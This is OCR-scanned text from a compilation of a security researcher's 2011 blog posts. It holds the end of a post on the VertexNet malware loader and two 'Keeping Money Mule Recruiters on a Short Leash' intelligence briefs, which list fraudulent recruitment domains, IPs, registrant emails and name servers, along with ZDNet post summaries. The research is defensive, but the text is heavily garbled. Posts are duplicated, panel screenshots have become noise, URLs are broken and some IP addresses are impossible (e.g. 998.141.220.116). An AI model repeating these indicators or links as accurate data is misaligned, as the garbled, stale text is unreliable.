Ge IP (Remote Addr) Computer name Country idle Version T 5S 


G2 @ 1 127.0,0.1/192.168.0.19 DARKCOO -PC6/DarkCoder French [France] 33 és vi0b B&O 
Page: 1 


a 


c (PHEYC++ 


2006 
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) VertexNet 1b 


¢ C ® localhost/pane 


VertexNet 


Users lists. .Settings:. .cCommands:. .:About:. .Logoff:. 


© Panel settings 


) VertexNet vO.1b 
€ C ® localhost/pane 


arami,@Param?2,@ 


OParamt 
Param? 
@Params 


CParamt 


Example 


@Param! 
€ ON a new thr if OFF then the thread w 


Kine nemnenin 2 mentor simmons had 


Monitoring of Vertex Net Loader’s development is ongoing. 


Related posts: 
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[1]A Peek Inside a New DDoS Bot - "Snap" 
[2]Coding Spyware and Malware for Hire 

[3]Will Code Malware for Financial Incentives 
[4]E-crime and Socioeconomic Factors 

[5]Web Based Botnet Command and Control Kit 2.0 


[6]BlackEnergy DDoS Bot Web Based 


[7]A New DDoS Malware Kit in the Wild 


[8]The Cyber Bot - Web Based Malware 


[9]The Black Sun Bot - Web Based Malware 


[10]Custom DDoS Capabilities Within a Malware 


[11]Botnet on Demand Service 


[12]Loads.cc - DDoS for Hire Service 


[13]Using Market Forces to Disrupt Botnets 
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[14]Botnet Communication Platforms 
[15]A Botnet Master's To-Do List 


[16]DDoS on Demand VS DDoS Extortion 


[17]How Does a Botnet with 100k Infected PCs Look Like? 


This post has been reproduced from [18]Dancho Danchev’s blog. Follow him 
[19]on Twitter. 
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7.5.9 Keeping Money Mule Recruiters on a Short Leash - Part Nine (2011-05-30 12:09) 


Masterart Group LLC 


—_ What We Do y * Services Overview 8 About us 


Welcome to Masterart Group LLC Authorization 


The following brief summarizes currently active money mule recruitment web sites, actively 
recruiting money mules for the processing of fraudulently obtained funds. 


Currently active sites residing within AS42708, PORTLANE Network www.portlane.com; 
AS29713, INTERPLEXINC Interplex LLC; AS38913, Enter-Net-Team-AS; AS24940, HETZNER-AS 
Hetzner Online: 

ATLANTALTD-UK.CC - 193.105.134.233 

ATLANTA-LTD-UK.NET - 78.46.105.205 - Email: admin@atlanta-Itd-uk.net 
3ATLANTA-UK.COM - 193.105.134.233 

BLITZNET-GROUPINC.CC - 78.46.105.205 - Email: admin@derwart-group.at 
5DALI-STYLE.COM - 98.141.220.117 

DALISTYLE-GROUP.CC - 98.141.220.118 - Email: tolls@mailti.com 
DERWOODE-GROUP.COM - 98.141.220.117 

DERWOODE-GROUP.NET - 98.141.220.117 

GLACIS-GROUPLLC.COM - 193.105.134.232 

1GLACISGROUP-LLC.NET - 193.105.134.233 

IT-AMIRA.NET - 86.55.210.3 - Email: support@it-amira.net 

ITAMIRA-DE.COM - 86.55.210.6 - Email: admin@itamira-de.com 

ITSERV-DE.CO - 78.46.105.205 - Email: admin@itserv-de.co 

IT-SERVICELTD.BE - 78.46.105.205 

KADE-GROUP.COM - 86.55.210.4 - Email: admin@kade-group.com 
MASTERART-GROUP.COM - 98.141.220.116 - Email: east@mail13.com 
MENDRYLTD.COM - 98.141.220.117 - Email: admin@mendryltd.com 
MENZEL-GROUR,TV - 98.141.220.118 - Email: admin@devotion-company.com 
MITISSANSERVICE-GROUP-LTD.CC - 98.141.220.117 - Email: berra@cutemail.org 
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MITISSANSERVICEGROUP-LTD.COM - 98.141.220.117 - Email: alibi@mailae.com 
oregonlitd-uk.cc - 86.55.210.5 - Email: cause@ca4.ru 

PARLEN-GROUPLLC.COM - 98.141.220.118 - Email: admin@parlen-groupllc.com 
PARLENGROUPLLC.NET - 98.141.220.114 

PARLEN-GROUP-USA.COM - 98.141.220.118 

quad-groupuk.cc - 86.55.210.6 - Email: prissy@mailae.com 
QUAD-GROUPUK.CC - 86.55.210.6 - Email: prissy@mailae.com 
QUAD-IT-GROUP.COM - 193.105.134.232 - Email: admin@quad-it-group.com 
QUINTAGROUP.CC - 98.141.220.117 - Email: cola@mailae.com 
QUINTA-GROUPUS.COM - 98.141.220.118 - Email: admin@quinta-groupus.com 
QUINTA-LLC.NET - 98.141.220.118 - Email: admin@quinta-llc.net 
REXTECHINNOVATION.COM - 98.141.220.118 - Email: admin@rextechinnovation.com 
REXTECHLTD.CC - 98.141.220.115 - Email: blurt@fxmail.net 
REXTECHLTD-US.COM - 98.141.220.118 - Email: admin@rextechlitd-us.com 
SPECIAL-ART-LTD.COM - 193.105.134.233 - Email: admin@special-art-ltd.com 
SPECIAL-ART-UK.CC - 193.105.134.234 

SUBLIME-LTD.NET - 98.141.220.118 - Email: admin@sublime-lItd.net 
TARGETMARKETGROUP-LLC.CC - 98.141.220.117 - Email: admin@targetmarketgroup-llc.cc 
TAZPROGLTD-US.COM - 98.141.220.117 - Email: admin@tazprogltd-us.co 
VNSPROJECT-DE.CC - 78.46.105.205 - Email: admin@vnsproject-de.cc 
VORTEXLLC-UK.COM - 193.105.134.232 - Email: admin@vortexllc-uk.com 
VORTEX-LLC-UK.NET - 193.105.134.230 - Email: admin@vortex-llc-uk.net 
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Name servers of notice: 

NS1.NAMESUKNS.CC - 178.162.172.48 - Email: pal@bz3.ru 
NS2.NAMESUKNS.CC - 69.10.56.131 

NS3.NAMESUKNS.CC - 66.199.229.123 


NS1.NAMEUK.AT - 178.162.172.57 - Email: admin@nameuk.at 
NS2.NAMEUK.AT - 69.10.56.132 
NS3.NAMEUK.AT - 66.199.229,.124 


NS1.UKDNSTART.NET - 178.162.172.40 - Email: admin@ukdnstart.net 
NS2.UKDNSTART.NET - 69.10.56.130 
NS3.UKDNSTART.NET - 66.199.229.122 


NS1.DNSUS.SU - 217.23.15.137 - Email: wifi@yourisp.ru 
NS2.DNSUS.SU - 87.118.81.7 
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NS3.DNSUS.SU - 87.118.81.10 


NS1.NAMEUSNS.SU - 217.23.15.138 - Email: lavier@bz3.ru 
NS2.NAMEUSNS.SU - 84.19.161.7 
NS3.NAMEUSNS.SU - 84.19.161.10 


NS1.USDENNS.SU - 217.23.15.136 - Email: lipstick@free-id.ru 
NS2.USDENNS.SU - 84.19.161.7 
NS3.USDENNS.SU - 84.19.161.10 


Monitoring of money mule recruitment campaigns is ongoing. 


Related posts: 

[1]Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT 
[2]Keeping Money Mule Recruiters on a Short Leash - Part Seven 
[3]Keeping Money Mule Recruiters on a Short Leash - Part Six 
[4]Keeping Money Mule Recruiters on a Short Leash - Part Five 
[5]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
[6]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[7]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[8]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[9]Money Mule Recruiters on Yahoo!’s Web Hosting 

[10]Dissecting an Ongoing Money Mule Recruitment Campaign 
[11]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[12]Keeping Reshipping Mule Recruiters on a Short Leash 
[13]Keeping Money Mule Recruiters on a Short Leash 
[14]Standardizing the Money Mule Recruitment Process 

[15]Inside a Money Laundering Group’s Spamming Operations 
[16]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[17]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [18]Dancho Danchev’s blog. 


http: //ddanchev. blogspot .com/2011/05/keeping-money-mule-recruiters-on-short_25.htm1 


. http: //ddanchev. blogspot . com/2011/05/keeping-money-mule-recruiters-on-short -html 
. http: //ddanchev. blogspot. com/2011/03/keeping-money-mule-recruiters-on-short .html 
. http: //ddanchev. blogspot .com/2011/01/keeping-money-mule-recruiters-on-short.htm 
. http: //ddanchev. blogspot. com/2010/04/dns-infrastructure-of-money-mule html 

. http: //ddanchev. blogspot . com/2010/04/keeping-money-mule-recruiters-on-short html 
. http: //ddanchev. blogspot .com/2010/03/money-mule-recruitment-campaign-serving.htm 
. http: //ddanchev. blogspot . com/2010/03/keeping-money-mule-recruiters-on-short html 
. http: //ddanchev. blogspot . com/2010/03/money-mule-recruiters-on-yahoos-web-html 


10. http: //ddanchev.blogspot.com/2010/02/dissecting-ongoing-money-mule.htm 


11. http: //ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short .htm 


OANAUAWNEH 


09 
i] 


. http: //ddanchev. blogspot. com/2009/12/keeping-reshipping-mule-recruiters-on.htm 


13. http: //ddanchev. blogspot .com/2009/11/keeping-money-mule-recruiters-on-short .htm 


14. http: //ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment .htm 


. http: //ddanchev.blogspot .com/2009/05/inside-money-laundering-groups- spamming. htm 
16. http: //ddanchev.blogspot .com/2008/07/money-mule-recruiters-use-asproxs-fast .htm 
17. http: //ddanchev. blogspot .com/2008/10/money-mules-syndicate-actively.htm 
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18. http://ddanchev. blogspot .com/ 


7.5.10 Keeping Money Mule Recruiters on a Short Leash - Part Nine (2011-05-30 12:09) 


Masterart Group LLC 


= What We Do y ? Services Overview 8 About us 


Welcome to Masterart Group LLC Authorization 


The following brief summarizes currently active money mule recruitment web sites, ac- 
tively recruiting money mules for the processing of fraudulently obtained funds. 


Currently active sites residing within AS42708, PORTLANE Network www.portlane.com; 
AS29713, INTERPLEXINC Interplex LLC; AS38913, Enter-Net-Team-AS; AS24940, HETZNER-AS 
Hetzner Online: 

ATLANTALTD-UK.CC - 193.105.134.233 

ATLANTA-LTD-UK.NET - 78.46.105.205 - Email: admin@atlanta-Itd-uk.net 

3ATLANTA-UK.COM - 193.105.134.233 

BLITZNET-GROUPINC.CC - 78.46.105.205 - Email: admin@derwart-group.at 


5DALI-STYLE.COM - 98.141.220.117 
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DALISTYLE-GROUP.CC - 98.141.220.118 - Email: tolls@mailti.com 
DERWOODE-GROUP.COM - 98.141.220.117 

DERWOODE-GROUP.NET - 98.141.220.117 

GLACIS-GROUPLLC.COM - 193.105.134.232 

1GLACISGROUP-LLC.NET - 193.105.134.233 

IT-AMIRA.NET - 86.55.210.3 - Email: support@it-amira.net 

ITAMIRA-DE.COM - 86.55.210.6 - Email: admin@itamira-de.com 

ITSERV-DE.CO - 78.46.105.205 - Email: admin@itserv-de.co 

IT-SERVICELTD.BE - 78.46.105.205 

KADE-GROUP.COM - 86.55.210.4 - Email: admin@kade-group.com 
MASTERART-GROUP.COM - 98.141.220.116 - Email: east@mail13.com 
MENDRYLTD.COM - 98.141.220.117 - Email: admin@mendryltd.com 
MENZEL-GROUR.TV - 98.141.220.118 - Email: admin@devotion-company.com 
MITISSANSERVICE-GROUP-LTD.CC - 98.141.220.117 - Email: berra@cutemail.org 
MITISSANSERVICEGROUP-LTD.COM - 98.141.220.117 - Email: alibi@mailae.com 
oregonitd-uk.cc - 86.55.210.5 - Email: cause@ca4.ru 

PARLEN-GROUPLLC.COM - 98.141.220.118 - Email: admin@parlen-groupllc.com 
PARLENGROUPLLC.NET - 98.141.220.114 

PARLEN-GROUP-USA.COM - 98.141.220.118 

quad-groupuk.cc - 86.55.210.6 - Email: prissy@mailae.com 
QUAD-GROUPUK.CC - 86.55.210.6 - Email: prissy@mailae.com 
QUAD-IT-GROUP.COM - 193.105.134.232 - Email: admin@quad-it-group.com 
QUINTAGROUP.CC - 98.141.220.117 - Email: cola@mailae.com 
QUINTA-GROUPUS.COM - 98.141.220.118 - Email: admin@quinta-groupus.com 


QUINTA-LLC.NET - 98.141.220.118 - Email: admin@quinta-llc.net 
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REXTECHINNOVATION.COM - 98.141.220.118 - Email: admin@rextechinnovation.com 
REXTECHLTD.CC - 98.141.220.115 - Email: blurt@fxmail.net 

REXTECHLTD-US.COM - 98.141.220.118 - Email: admin@rextechltd-us.com 
SPECIAL-ART-LTD.COM - 193.105.134.233 - Email: admin@special-art-ltd.com 
SPECIAL-ART-UK.CC - 193.105.134.234 


SUBLIME-LTD.NET - 98.141.220.118 - Email: admin@sublime-ltd.net 


TARGETMARKETGROUP-LLC.CC - 98.141.220.117 - Email: admin@targetmarketgroup-llc.cc 


TAZPROGLTD-US.COM - 98.141.220.117 - Email: admin@tazprogltd-us.co 
VNSPROJECT-DE.CC - 78.46.105.205 - Email: admin@vnsproject-de.cc 
VORTEXLLC-UK.COM - 193.105.134.232 - Email: admin@vortexllc-uk.com 


VORTEX-LLC-UK.NET - 193.105.134.230 - Email: admin@vortex-llc-uk.net 
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MENZEL-¢ 
PARLEN-G 
PARLEN- 
QUINTA-GRO 
QUINTA-LLC, NET 


-EXTECHINNC 


LLC.NET 


ATLANTA-LTD-UK.NET 


Name servers of notice: 
NS1.NAMESUKNS.CC - 178.162.172.48 - Email: pal@bz3.ru 
NS2.NAMESUKNS.CC - 69.10.56.131 


NS3.NAMESUKNS.CC - 66.199.229.123 


NS1.NAMEUK.AT - 178.162.172.57 - Email: admin@nameuk.at 
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NS2.NAMEUK.AT - 69.10.56.132 


NS3.NAMEUK.AT - 66.199.229.124 


NS1.UKDNSTART.NET - 178.162.172.40 - Email: admin@ukdnstart.net 
NS2.UKDNSTART.NET - 69.10.56.130 


NS3.UKDNSTART.NET - 66.199.229.122 


NS1.DNSUS.SU - 217.23.15.137 - Email: wifi@yourisp.ru 
NS2.DNSUS.SU - 87.118.81.7 


NS3.DNSUS.SU - 87.118.81.10 


NS1.NAMEUSNS.SU - 217.23.15.138 - Email: lavier@bz3.ru 
NS2.NAMEUSNS.SU - 84.19.161.7 


NS3.NAMEUSNS.SU - 84.19.161.10 


NS1.USDENNS.SU - 217.23.15.136 - Email: lipstick@free-id.ru 
NS2.USDENNS.SU - 84.19.161.7 


NS3.USDENNS.SU - 84.19.161.10 


Monitoring of money mule recruitment campaigns is ongoing. 


Related posts: 
[1]Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT 
[2]Keeping Money Mule Recruiters on a Short Leash - Part Seven 


[3]Keeping Money Mule Recruiters on a Short Leash - Part Six 
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[4]Keeping Money Mule Recruiters on a Short Leash - Part Five 
[5]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
[6]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[7]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[8]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[9]Money Mule Recruiters on Yahoo!’s Web Hosting 

[10]Dissecting an Ongoing Money Mule Recruitment Campaign 
[11]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[12]Keeping Reshipping Mule Recruiters on a Short Leash 
[13]Keeping Money Mule Recruiters on a Short Leash 
[14]Standardizing the Money Mule Recruitment Process 

[15]Inside a Money Laundering Group’s Spamming Operations 
[16]Money Mule Recruiters use ASProx’s Fast Fluxing Services 


[17]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [18]Dancho Danchev’s blog. 


http: //ddanchev. blogspot .com/2011/05/keeping-money-mule-recruiters-on-short_25.html 


ttp://ddanchev. blogspot .com/2011/05/keeping-money-mule-recruiters-on-short.htm 
ttp://ddanchev. blogspot .com/2011/03/keeping-money-mule-recruiters-on-short.htm 
Pp: -s 


F //ddanchev . blogspot .com/2011/01/keeping-money-mule-recruiters- F 

( See TET 
_hetp://adanchey. blogspot. con/2010/04/keeping-noney-mule-recruiters-on- short. Wal 
_hetp://adanchey. blogspot.con/2010/08 /nney-mule-recruitnent~canpaign-serving tal 
a ee eee 
_hvep://adanchev. blogspot con/2010/08 /nney-mule-recruiters-on-yahoos-veb: hal 
10. http: //ddanchev blogspot . com/2010/02/dissect.ing- ongoing-money-mule.html 


11. http: //ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on- short .htm 
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. http: //ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.htm 
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. http: //ddanchev.blogspot .com/2009/05/inside-money-laundering-groups- spamming. htm 
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7.6 June 


7.6.1 Summarizing ZDNet’s Zero Day Posts for May (2011-06-08 16:24) 
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The following is a brief summary of all of my posts at ZDNet’s Zero Day for May. You can 


subscribe to my [1]personal RSS feed, [2]Zero Day’s main feed, or follow me on Twitter: 
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Recommended reading: 


¢ [3] China’s Blue Army: When nations harness hacktivists for information warfare 


01. [4]Vishing attack on Skype pushing scareware 

02. [5]Commtouch: 71 percent increase in new zombies 

03. [6]Osama execution video scam spreading on Facebook 

04. [7]New MAC OS X scareware delivered through blackhat SEO 

05. [8]’You visit illegal websites’ FBl-themed emails lead to scareware 

06. [9]Fake Microsoft Patch Tuesday emails lead to ZeuS crimeware 

07. [10]’Enable Dislike Button’ scam spreading on Facebook 

08. [11]NASA’s Goddard Space Flight Center FTP server hacked 

09. [12]’Checkout Your PROFILE Stalkers’ scam spreading on Facebook 

10. [13]’The World Funniest Condom Commercial - LOL’ scam spreading on Facebook 
11. [14]China’s Blue Army: When nations harness hacktivists for information warfare 


This post has been reproduced from [15]Dancho Danchev’s blog. Follow him 
[16]Jon Twitter. 


1. http: //www.zdnet .com/topics/danchot+danchev?o=1kmode=rss&tag=mantle_skin; content 


2. http: //feeds. feedburner .com/zdnet/securit 


.com/blog/security/vishing-attack-on-skype-pushing-scareware/8598 
.com/blog/security/commtouch-71-percent-increase- in-new-zombies/8602 
.com/blog/security/osama-execution-video-scam-spreading- on-facebook/860 
.com/blog/security/new-mac-os-x-scareware-delivered-through-blackhat-seo/8614 


.com/blog/security/you-visit-illegal-websites-fbi-themed-emails-lead-to-scareware/8618 


.zdnet .com/blog/security/fake-microsoft-patch-tuesday-emails-lead-to-zeus-crimeware/8646 


rfare-/8686 
15. http://ddanchev.blogspot.com/ 
16. http://twitter.com/danchodanche 
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7.7 July 


7.7.1 Summarizing ZDNet’s Zero Day Posts for June (2011-07-07 12:24) 


2 8 ee 


The following is a brief summary of all of my posts at ZDNet’s Zero Day for June. You can 
subscribe to my [1]personal RSS feed, [2]Zero Day’s main feed, or follow me on Twitter: 


x 


01. [3]’Hot Lesbian Video - Rihanna and Hayden Panettiere’ scam on Facebook leads to Mac 
malware 
02. [4]Sony Europe hacked by Lebanese grey hat hacker 
03. [5]Spamvertised United Parcel Service emails lead to scareware 
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04. [6]The most common iPhone passcodes 

05. [7JAutoRun malware infections declining 

06. [8]’McDonald’s Free Dinner Day’ emails lead to scareware 

07. [9]Two DDoS attacks hit Network Solutions 

08. [10]’The Creator of LulzSec arrested in London’ scam spreading on Facebook 

09. [11]Federal Reserve themed emails lead to ZeuS crimeware 

10. [12]’Photographer commited SUICIDE 3 days after shooting THIS video!’ scam spreading 
on Facebook 


This post has been reproduced from [13]Dancho Danchev’s blog. Follow him 
[14]on Twitter. 


1. http: //www.zdnet .com/topics/dancho+danchev?o=1kmode=rss&tag=mantle_skin; content 


2. http: //feeds.feedburner.com/zdnet/securit 


4 
5. 
6 

7 
8. 

9 

1 


12. bttp://www.zdnet .com/blog/security/photographer-commited-suicide-3-days-after-shooting-this-video-scam- 
spreading-on-facebook/8911 

13. http://ddanchev.blogspot.com/ 

14. http://twitter.com/danchodanche 
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7.7.2 Keeping Money Mule Recruiters on a Short Leash - Part Ten (2011-07-07 13:25) 
Sea2uus 
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The following intelligence brief is part of the [1]Keeping Money Mule Recruiters on a Short 
Leash series. In it, I'll expose currently active money mule recruitment domains, their domain 
registration details, currently responding IPs, and related ASs. 


Currently active money mule recruitment domains: 

ACWOODE-GROUP.COM - 184.168.64.173 - Email: admin@acwoode-group.com 
ACWOODE-GROUP.NET - 184.168.64.173 - Email: admin@acwoode-group.net 
ART-GROUPINTEGRETED.COM - 78.46.105.205 - Email: admin@art-groupintegreted.com 
ARTINTEGRATED-GROURP.NET - 78.46.105.205 - Email: crony@cutemail.org 
COMPLETE-ART-GROUP-LTD.COM - 193.105.134.233 - Email: saps@cutemail.org 
COMPLETE-ART-UK.NET - 193.105.134.232 - Email: admin@complete-art-uk.net 
CONDORLLC-UK.COM - 193.105.134.231 - Email: plods@fxmail.net 
CONDOR-LLC-UK.NET - 193.105.134.233 - Email: admin@condorllc-uk.net 
CONTEMP-USAINC.COM - 184.168.64.173 - Email: admin@contemp-usainc.com 
CONTEMP-USGROUP.COM - 184.168.64.173 - Email: admin@contemp-usgroup.com 
DE-KADEGROUP.CC - 193.105.134.230 - Email: cents@mailae.com 
DERWOODE-GROUP.CC - 98.141.220.115 - Email: web@derwoode-group.cc 
ELENTY-CO.NET - 184.168.64.173 - Email: abcs@mailti.com 

ELENTY-LLC.COM - 184.168.64.173 - Email: admin@elenty-llc.com 
GAPSONART.NET - 184.168.64.173 - Email: admin@gapsonart.net 
GLACIS-GROUPUK.NET - 78.46.105.205 - Email: admin@glacis-groupuk.net 
GURU-GROUP.CC - 184.168.64.173 - Email: admin@guru-group.cc 
GURU-GROUP.NET - 184.168.64.173 - Email: jj@cutemail.org 
INTECHTODEX-GROUP.COM - 184.168.64.173 - Email: uq@mail13.com 
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INTEGRATED-EUROPE-IT.NET - 78.46.105.205 - Email: admin@integrated-europe-it.net 
ITAGROUP-USA.NET - 98.141.220.117 - Email: admin@itagroup-usa.net 
IT-ANALISYS.COM - 98.141.220.115 - Email: yea@mailae.com 
ITANALYSISGROUP.NET - 998.141.220.116 - Email: admin@itanalysisgroup.net 
KADE-GROUPDE.NET - 78.46.105.205 - Email: zigzag@fxmail.net 
MASTERARTUSA.COM - 98.141.220.114 - Email: day@mailae.com 
NARTEN-ART.COM - 209.190.4.91 - Email: glamor@fxmail.net 
NARTENART.NET - 209.190.4.91 - Email: admin@nartenart.net 
quad-groupuk.cc - 78.46.105.205 - Email: prissy@mailae.com 
REFINEMENT-ANTIQUE.COM - 184.168.64.173 - Email: xe@fxmail.net 
SCAR-BEIINC.COM - 184.168.64.173 - Email: admin@scar-beiinc.com 
SKYLINE-ANTIQUE.COM - 209.190.4.91 - Email: blurs@mailae.com 
SKYLINE-LTD.NET - 209.190.4.91 - Email: admin@skyline-Itd.net 
SMARTLLC-UK.COM - 193.105.134.234 - Email: admin@smartllc-uk.com 
SMART-LLC-UK.NET - 193.105.134.233 - Email: pol@mailae.com 
SPECIAL-ARTUK.COM - 193.105.134.232 - Email: admin@special-artuk.com 
SUBLIMELTD.COM - 98.141.220.118 - Email: admin@sublimeltd.com 
TODEX-GROURP.NET - 184.168.64.173 - Email: admin@todex-group.net 
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NARTEN-ART.COM 2 90.4,.91 
NARTENART.NET 
INE-ANTIQUE,COM 
YLINE-LTD.NET 
AARTLLC-UK,.COM 


DOR-LL 
SMART-LLC- 
COMPLETE-ART- 


IR 
DE-KADEGROUP,.CC 
ODE-GROUP,.COM 


www 
co oO oO 


OD oO 
ao 


MASTERARTL OM 
ART-GROUPINTEGRETED.COM 


INTEGRATED-EUROPE-IT NET 
KADE-GROUPDE, NET 
guad-groupuk.ce 


The domains reside within the following ASs: AS10297, RoadRunner RR-RC; AS42708; PORT- 
LANE Network; AS26496; GODADDY.com; AS29713, INTERPLEXINC; AS24940, HETZNER-AS 
Hetzner Online. 


Name servers of notice: 

NS1.MKNS.SU - 85.25.250.244 - Email: mkns@cheapbox.ru 
NS2.MKNS.SU - 46.4.148.119 

NS3.MKNS.SU - 184.82.158.76 

NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru 
NS2.MLDNS.SU - 46.4.148.74 

NS3.MLDNS.SU - 184.82.158.74 

NS1.MNAMEDL.SU - 85.25.250.211 - Email: mnamed@yourisp.ru 
NS2.MNAMEDL.SU - 46.4.148.118 

NS3.MNAMEDL.SU - 184.82.158.75 

NS1.DNSUS.SU - 217.23.15.137 - Email: wifi@yourisp.ru 
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NS2.DNSUS.SU - 87.118.81.7 

NS3.DNSUS.SU - 87.118.81.10 

NS1.NAMEUSNS.SU - 217.23.15.138 - Email: lavier@bz3.ru 
NS2.NAMEUSNS.SU - 84.19.161.7 

NS3.NAMEUSNS.SU - 84.19.161.10 

NS1.USDENNS.SU - 217.23.15.136 - Email: lipstick@free-id.ru 
NS2.USDENNS.SU - 84.19.161.7 

NS3.USDENNS.SU - 84.19.161.10 

NS1.NAMESUKNS.CC - 86.55.210.4 - Email: pal@bz3.ru 
NS2.NAMESUKNS.CC - 193.105.134.232 

NS3.NAMESUKNS.CC - 193.105.134.237 

NS1.NAMEUK.AT - 86.55.210.5 - Email: admin@nameuk.at 
NS2.NAMEUK.AT - 193.105.134.233 

NS3.NAMEUK.AT - 193.105.134.236 

NS1.UKDNSTART.NET - 86.55.210.5 - Email: admin@ukdnstart.net 
NS2.UKDNSTART.NET - 193.105.134.233 

NS3.UKDNSTART.NET - 193.105.134.236 

NS1.DENDRUYOS.NET - 86.55.210.4 - Email: admin@dendruyos.net 
NS2.DENDRUYOS.NET - 193.105.134.232 

NS3.DENDRUYOS.NET - 193.105.134.237 

NS1.DEDNSAUTH.NET - 86.55.210.2 - Email: admin@dednsauth.net 
NS2.DEDNSAUTH.NET - 193.105.134.230 

NS3.DEDNSAUTH.NET - 193.105.134.239 

NS1.DELTOPOOR.AT - 86.55.210.3 - Email: admin@deltopoor.at 
NS2.DELTOPOOR.AT - 193.105.134.231 

NS3.DELTOPOOR.AT - 193.105.134.238 


Monitoring of ongoing money mule recruitment campaigns is ongoing. 


Related posts: 

[2]Keeping Money Mule Recruiters on a Short Leash - Part Nine 
[3]Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT 
[4]Keeping Money Mule Recruiters on a Short Leash - Part Seven 
[5]Keeping Money Mule Recruiters on a Short Leash - Part Six 
[6]Keeping Money Mule Recruiters on a Short Leash - Part Five 
[7]The DNS Infrastructure of the Money Mule Recruitment Ecosystem 
[8]Keeping Money Mule Recruiters on a Short Leash - Part Four 
[9]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[10]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[11]Money Mule Recruiters on Yahoo!’s Web Hosting 

[12]Dissecting an Ongoing Money Mule Recruitment Campaign 
[13]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[14]Keeping Reshipping Mule Recruiters on a Short Leash 
[15]Keeping Money Mule Recruiters on a Short Leash 
[16]Standardizing the Money Mule Recruitment Process 

[17]Inside a Money Laundering Group’s Spamming Operations 
[18]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[19]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [20]Dancho Danchev’s blog. 
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http: //ddanchev. blogspot .com/2011/05/keeping-money-mule-recruiters-on-short_30.htm 


http: //ddanchev.blogspot .com/2011/05/keeping-money-mule-recruiters-on-short_30.htm 
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7.7.3 Keeping Money Mule Recruiters on a Short Leash - Part Ten (2011-07-07 13:25) 


Home About the Company Products Articles Links Contact Us 


New Arrivals: 
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Welcome to TODEX InTech Group Authorization 
Enter to partners area 
Looking to buy art? Sell art? TODEX IriTech Group is Mie first choice for artists and buyers alike! TODE 
InTech Group ts an effective tool for the artist and emerging artist to market and promote thelr artina Logis” 
professional ang mexpensive Manner, We will Markel your art to the international Community of art Duper Password: * 
Vihether you are looking to buy or sell original art, TODEX InTech Group is the premier art site for those 


Registration Forgot Password? 


seeking to buy or sell original art online 


NO COMMISSIONS! Whether you are looking to buy art or Sell art, our site is fully optimized to get results 


FAST! TODEX Intech Group Is the future of buying and selling onginal art online. Artists who choos 


their Original art will recewe maximum marketing exposure, For artists, selling your art has never beer Latest projects 


easier, faster, or more cost-effective, Vile will help you sell your original art DIRECTLY to buyers worldwide 


with NO COMMISSIONS. Those wishing to buy art online are invited to browse our extensive online gallenes @ Asilver ewer 
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The following intelligence brief is part of the [1]Keeping Money Mule Recruiters on a 
Short Leash series. In it, I'll expose currently active money mule recruitment domains, their 
domain registration details, currently responding IPs, and related ASs. 


Currently active money mule recruitment domains: 

ACWOODE-GROUP.COM - 184.168.64.173 - Email: admin@acwoode-group.com 
ACWOODE-GROUPRP.NET - 184.168.64.173 - Email: admin@acwoode-group.net 
ART-GROUPINTEGRETED.COM - 78.46.105.205 - Email: admin@art-groupintegreted.com 
ARTINTEGRATED-GROUP.NET - 78.46.105.205 - Email: crony@cutemail.org 
COMPLETE-ART-GROUP-LTD.COM - 193.105.134.233 - Email: saps@cutemail.org 
COMPLETE-ART-UK.NET - 193.105.134.232 - Email: admin@complete-art-uk.net 
CONDORLLC-UK.COM - 193.105.134.231 - Email: plods@fxmail.net 
CONDOR-LLC-UK.NET - 193.105.134.233 - Email: admin@condor-Ilc-uk.net 
CONTEMP-USAINC.COM - 184.168.64.173 - Email: admin@contemp-usainc.com 
CONTEMP-USGROUP.COM - 184.168.64.173 - Email: admin@contemp-usgroup.com 
DE-KADEGROUP.CC - 193.105.134.230 - Email: cents@mailae.com 
DERWOODE-GROUP.CC - 98.141.220.115 - Email: web@derwoode-group.cc 
ELENTY-CO.NET - 184.168.64.173 - Email: abcs@mailti.com 

ELENTY-LLC.COM - 184.168.64.173 - Email: admin@elenty-llc.com 
GAPSONART.NET - 184.168.64.173 - Email: admin@gapsonart.net 
GLACIS-GROUPUK.NET - 78.46.105.205 - Email: admin@glacis-groupuk.net 
GURU-GROUP.CC - 184.168.64.173 - Email: admin@guru-group.cc 
GURU-GROUP.NET - 184.168.64.173 - Email: jj@cutemail.org 
INTECHTODEX-GROUP.COM - 184.168.64.173 - Email: ug@mail13.com 
INTEGRATED-EUROPE-IT.NET - 78.46.105.205 - Email: admin@integrated-europe-it.net 


ITAGROUP-USA.NET - 98.141.220.117 - Email: admin@itagroup-usa.net 
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IT-ANALISYS.COM - 998.141.220.115 - Email: yea@mailae.com 


ITANALYSISGROUP.NET - 998.141.220.116 - Email: admin@itanalysisgroup.net 


KADE-GROUPDE.NET - 78.46.105.205 - Email: zigzag@fxmail.net 
MASTERARTUSA.COM - 98.141.220.114 - Email: day@mailae.com 
NARTEN-ART.COM - 209.190.4.91 - Email: glamor@fxmail.net 
NARTENART.NET - 209.190.4.91 - Email: admin@nartenart.net 
quad-groupuk.cc - 78.46.105.205 - Email: prissy@mailae.com 
REFINEMENT-ANTIQUE.COM - 184.168.64.173 - Email: xe@fxmail.net 
